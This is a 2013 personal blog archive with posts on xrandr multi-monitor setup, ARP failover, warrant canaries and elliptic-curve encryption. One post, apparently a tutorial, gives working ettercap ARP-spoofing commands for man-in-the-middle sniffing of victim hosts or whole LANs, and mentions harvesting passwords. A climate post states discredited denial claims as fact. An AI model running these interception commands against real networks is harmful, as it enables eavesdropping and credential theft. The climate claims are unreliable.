Monday, September 30, 2013

Fedora Linux with Multiple Monitors

Quite annoyingly, a default install of Fedora with XFCE on a laptop computer doesn't support multiple monitors properly.  If you plug an external screen in, the only option is to mirror the main screen (using the function keys, fn-F3 or some such), which is seldom what I want.  I prefer having a bigger desktop stretched over both screens.  Even though the two may not have the same resolution, I think that it is a better use of pixels.

Old Fashioned Setup

Sometimes the prehistorical command line works best.  The two screens can be configured with xrandr, but one has to remember to rerun xrandr before the external screen is unplugged, to exclude it (turn it off).  It can be made more convenient by hooking two scripts to a pair of hot keys, which would bring your laptop machine back into this century.

First you need to do some sleuthing.  Simply run xrandr with no parameters:

$ xrandr
Screen 0: minimum 320 x 200, current 1366 x 1536, maximum 8192 x 8192
VGA-0 connected 1024x768+0+768 (normal left inverted right x axis y axis) 304mm x 228mm
   1024x768       74.9*    75.1     70.1     71.8     60.0  
   832x624        74.6  
   640x480        72.8     75.0     66.7     60.0  
   640x400        70.1  
LVDS-0 connected 1366x768+0+0 (normal left inverted right x axis y axis) 344mm x 193mm
   1366x768       60.0*+
   1152x768       59.8  
   1024x768       59.9  
   720x480        59.7  
   640x480        59.4
From this command, you can see that the displays are named LVDS-0 (laptop) at 1366x768 and VGA-0 (monitor) at 1024.768. 

Configure the monitor VGA-0, to the right of the laptop screen LVDS-0:
$ xrandr --output VGA-0 --auto --right-of LVDS-0

To disable the external screen before unplugging it:
$ xrandr --output LVDS-0

Graphical Setup

Alternatively, use the graphical utility arandr:
# yum install arandr

Run that utility and click-drag-drop the screens where you want them!

Obstreperous Hardware

Sometimes you encounter weird hardware that hangs the system when tries to probe it.  In these cases you need to create an Xorg.conf file and configure things manually.  See this link

'Hope that helps!

Saturday, September 28, 2013


The Church of Global Warming alarmists are getting really desperate.  They are now claiming with 95% certainty that human produced CO2 is causing catastrophic global warming and that it must be stopped at all costs, otherwise the sky will fall on our heads tomorrow.  Humanity needs to extinguish all organic power stations and go back to shivering in caves to prevent further warming...

Warming, What Warming?

Unfortunately for the alarmists, reality just flat out refuses to play ball and back them up.  For the past 15 years, despite us having emitted massively more organic gasses than ever before, the earth simply refused to warm up.  How many more years of contradicting data will it take to make the Church of Global Warming prophets admit that their computer models are maybe just a wee little bit off kilter?  Could it be that there are lots of green things out there that love to breathe CO2?

Global Cooling

Anyone over 50 is old enough to remember their predecessor, the Church of Global Cooling of the 1970s.  Their prophesies didn't come true either and amusingly, some of the prophets of the modern church were in the older one - professional firebrand preachers: Repent, repent, the end is nigh...

Moreover, global warming is a good thing.  More warming will open up the northern tundra to farming. Russia and Canada will benefit and in the extreme, even Antarctica may be livable one day. Global cooling however, can be a real show stopper - freezing over the northern areas will cause famine and starvation on a massive scale.

Fire In The Hole!

All I can say is that some 20,000 years ago, those cave men must have lit enormous bon fires in their caves to bring an end to the last ice age, so going back to living in caves may not do it...

Sunday, September 22, 2013

ARP, the mystery protocol that makes a LAN work

Address Resolution Protocol

Usually, ARP just works and most people are blissfully unaware of it, but once in a while, I run into a problem.

ARP is the mystery protocol that makes a LAN work.  When a host wants to talk to another host on a LAN, it sends out a Who Has w.x.y.z message and gets an I Am reply. After that the system knows how to talk to each other using their MAC addresses and the LAN switch knows how to route the packets between the two hosts. 

Fail Over of Servers

This is all very nice when you are running an ordinary LAN, but the wheels tend to fall off when you run a system with redundancy and fail over.

What happens in a fail over case, is that some devices will remember the old connection and will refuse to talk to the backup host, because while the backup host has the same IP address as the now defunct host, its MAC address is different. The entries in the ARP table can take a very long time to time out, more than 8 minutes in most Linux systems.

The solution is to force an ARP table update in hosts on the LAN, using the arping command:
$ arping -A -c 1 -I em0

The above example will send an unsolicited I Am reply to device on the LAN. Read man arping for more details. (Some devices will respond to a request and some to an answer, so the best strategy is to send both to each device that you need to update, using the -U for one command and -A for the other.)

You can verify what is happening using tcpdump:
# tcpdump -lni em0 arp 

This is known as a gratuitous or unsolicited ARP to update a neighbour's cache.


Another problem arises when a backup system causes a LAN loop. 

Broadcasted ARP messages will get stuck in the loop and will clog up the LAN after a little while. The spanning tree protocol was devised to control ethernet switches and prevent loops, but in my experience it never works the way I want, so the best solution is to avoid making loops in the first place, rather than try to fix it using spanning tree.

ARP Poisoning

One of the myths surrounding a switched environment is that it prevents packet sniffing. It only makes it a little more awkward. Anyone can put their network card into promiscuous mode and capture packets between other hosts, by using ARP Spoofing. All you need is Ettercap.

ARP Cache

ARP is the Address Resolution Protocol. It is used to translate IP Addresses to MAC Addresses (Physical Address). A computer sends a query out to its broadcast domain asking who has a certain IP address. When the device at the IP address receives the packet it replies with its MAC Address and the requesting computer will log the response in its ARP cache. 

The ARP cache can be viewed by typing arp –a from the command-line:
Interface: --- 0x5
Internet Address Physical Address Type 00-0b-cd-ef-2c-ff dynamic 00-0e-7f-ef-b5-8d dynamic

ARP Spoofing

How ARP Spoofing works is by an attacker PC sending out fake ARP responses to victim PC’s stating that they are someone else, the victim PC then updates their ARP cache to direct traffic to the attacker. The attacker will log, read, or modify the packets and then forward them to the destination.

This can be done using arping as discussed above, or one can use EttercapEttercap provides a GUI which can be launched from the command-line using ettercap –G or it can be run from the command-line entirely.

Basic Sniffing

To watch traffic passing by on the network use:
# ettercap –Tzq –i eth0

This will put ettercap into text mode, it will not ARP scan the network and will be quiet. Only interesting traffic will be displayed as it passes and it will listen on interface eth0 (or em1 or wlan0... use ifconfig to see what is available).

Man In The Middle Attack 

To sniff traffic between 2 hosts the attacker can run the following command from his Linux work station:
# ettercap -i eth0 –T –M arp /victim_ip_A/ /victim_ip_B/

The –i switch is telling ettercap to use a specific interface, in this case eth0, the –T switch is telling ettercap to use the Text interface and the –M switch is telling ettercap to use the Man-in-Middle-Mode (MITM).

Sniffing Multiple Hosts 

Multiple hosts can be sniffed with a command such as:
# ettercap –i eth0 –T –M arp / / /

If traffic to a certain port only, such as Telnet need to be captured the command would look like:
# ettercap –i eth0 –T –M arp / / /

Sniffing All Hosts

To sniff traffic between all hosts on a small network:
# ettercap –T –M arp // //

Depending on the size of the network, this may cause dropped packets and performance issues and an angry IT person may eventually sneak up and hit you with an ugly stick.


  • Sniffing HTTPS
  • Collecting usernames and passwords
  • Injecting traffic
  • OS fingerprinting

Logging The Output

 To log the output of Ettercap you can use the following:
  • -L This will log both the packet detail (filename.ecp) and the info (filename.eci)
  • -l This will log only info (filename.eci)
  • -w Write output to a pcap file (viewable with Wireshark)

The syntax to log the output would be:
# ettercap –T –L filename –qM arp /ip_address_A/ /ip_address_B/

Other useful options:
  • -P use plugin (to view plugins use ettercap –TQ press p to view the plugin menu)
  • -c Compress the output (gzip)

Viewing The Output

The output from ettercap is a standard pcap file and can be viewed using etterlog, tcpdump, wireshark, or sent directly to the screen.

Using Ettercap for Fun and Profit

Ettercap can be used to perform MITM attacks and capture traffic between 2 hosts, just like the good folks at the NSA and GCHQ like to do.

Obviously this traffic can be parsed for useful information using grep.

You could run dsniff on the same PC and LAN card to run the traffic through that.

You could run driftnet to view any pictures that are passing the interface, or you could send the visited URL’s to your browser to see what other LAN users are doing and pretty soon, you will feel like a veritable Eddy Snowden.


Note that the ettercap syntax differs slightly from version to version.

To MITM someone you may need either:
# ettercap -i eth0 –T –M arp /victim_ip_A/ /victim_ip_B/
# ettercap -i eth0 –T –M arp /victim_ip_A/port/ /victim_ip_B/port/

or to MITM everybody:
# ettercap -i eth0 –T –M arp // //
# ettercap -i eth0 –T –M arp /// ///

Thanks to Mohammad Aamir, who spotted a mistake.

Have fun!


Monday, September 9, 2013

Negative Disclosure

Some security related web sites have started to proclaim that they have had '0 Police Information Requests', or something to that effect.  This is intended as a 'dead man's switch'.  When they do get a police information request, they intend to remove that statement, not update it to 1.

This won't work.  When they get a subpoena with an accompanying gag order and remove that statement, they can probably be charged with obstruction of justice and contempt of court and likely a few other things as well, so those statements will never be removed.

If you were wondering, I haven't gotten any information requests either - anyone can simply get the information from Google and don't have to ask me!

Friday, September 6, 2013


The Analytical Engine

Whenever I glance at my site statistics, the USA is at the top of list - no surprise there, but the second entry is always Ukraine.  Uhmmm, what, why Ukraine?

Is Google Analytics really so incredibly bad, or is the FSB based in Ukraine maybe?

More likely someone in Ukraine just loves my ramblings and sits and clicks the refresh button all day...

Take Back the Intertubes

Bruce Schneier wrote a column on taking back the internet

I just like that picture of Senator Hatch's Intertubes...

Throwing an Eliptic Curve Ball

Defeatist Attitudes

The hullabaloo around the pervasive NSA and GCHQ snooping is still ongoing.  Nevertheless, the common public is indifferent, since they don't understand it and feel that they cannot do anything about it anyway - defeatism at its worst.

Computer security is an asymmetric battle.  The little guy is up against goliath, with only some obscure mathematics to safeguard him. The sad fact of the matter is that we were never supposed to have to take on the likes of the NSA and GCHQ.  They were supposed to be the good guys, but their overreach have moved them over to the Dark Side.

Leaky Sieves

The problem is that the NSA and GCHQ are leaky sieves.  They gather tons of data and then leak it out to all and sundry - after all, what is the point of gathering data if nobody will ever look at it?  Therefore the only way to secure your data is to ensure that they can never get their grubby paws on  it in the first place.

The computer geeks of the world have a heavy burden to shoulder, trying to keep company business transactions secure, installing and deploying encryption systems despite general apathy and the constant nagging feeling that it is all for naught - that you are forced to go to a lot of trouble to install a complex encryption system that has already been broken without your knowledge.

Eliptic Curve and Diffie Hellman to the Rescue 

At this point, after reading numerous  articles, my advice is to switch to Elliptic Curve Encryption with the Diffie Hellman Key Exchange, despite Bruce Schneier's reservations about the NSA involvement in the selection of the constants (Much as I dislike their current overreach, the NSA isn't all bad, just don't use Dual_EC_DRBG from NIST SP 800-90, which was discredited by very good Microsoft cryptographers. :).

Look for the keyword ECDHE when you select and install off the shelf VPN equipment or software.  Make the keys as long as you can tolerate (larger than 500 bits) and put your trust in forward security, so that if one session gets compromised, it doesn't automatically spill all the beans in your NSA archive. That seems to be about the best you can do.

You should use standards and devices that are designed to be interoperable, for example Suite B described on this page: and the one I prefer would be this, which is Elliptic Curve  key agreement with a Discrete Logarithm algorithm and a Diffie Hellman handshake.

Interoperable equipment ensures that the implementation was reviewed by multiple parties.  Do not trust proprietary algorithms from a single source, since it could be snake oil.

Sometimes I get tempted to add a large block of /dev/urandom data to the end of every email, just to give the spooks grief...

Good Luck With This

***IDEA2048***�̽����=��-�w� �%� ��麿�(:����R �vO �� R� -�ו؅*� �
� _fT�Ϯ�M듾)[�=�vz�� ��?"�{���趢�� ��|T
CH�[ߋuK�� .D(��72 ���z -�
                          M=O��LF "��/L+S��m$򖹒�t3��M�c��Ǎ��QnT���PY����O� h �8�h G� ����m ���?�߄|=���><lK� d� ��<\��
                                     ���p�$���W��.&R� �� � ��K?V
                                                                 zs7����O�D� �#m����,�� � ��nh�� I Y�,w��ǒ89vH���b�S7�֒A ���M�O� ��"�)uO���bmWF��vڊ�7�D� p �� t����G2$����7L ��+T�ݿs�*��]�/9 �� 78X(�o��'���l( ���,���� � %�� +~ �����
           /i��#�ay���G�C �ln ^*e96�z|�6����c ��~���aL(��W<4ӌ&j����/    � ��w �z6sp?G�T�d�k�;l�����%o
���Z������`�z'̎���躸f�$ ���X�*�%���V�kA��d�p�=�|� �xyـ� V&� ��.1�{|
                                                                   � P���^`���ۚ�$M>ձ� � - 3� k���f| K�4�tK & ��{�Ir P�č XN �W���� �����r[�~z�øub[��x�ay���dn=o��P� � ���0��V ����s�Ji�����z.Ef�b���C���[��L� ��_Z�e� � nE���c��>T[�� qn s˱��i@W��+]�9����1&L� gɔ_ y�k�ɪ���QԲ"�zW�
;B�������0��***END IDEA2048***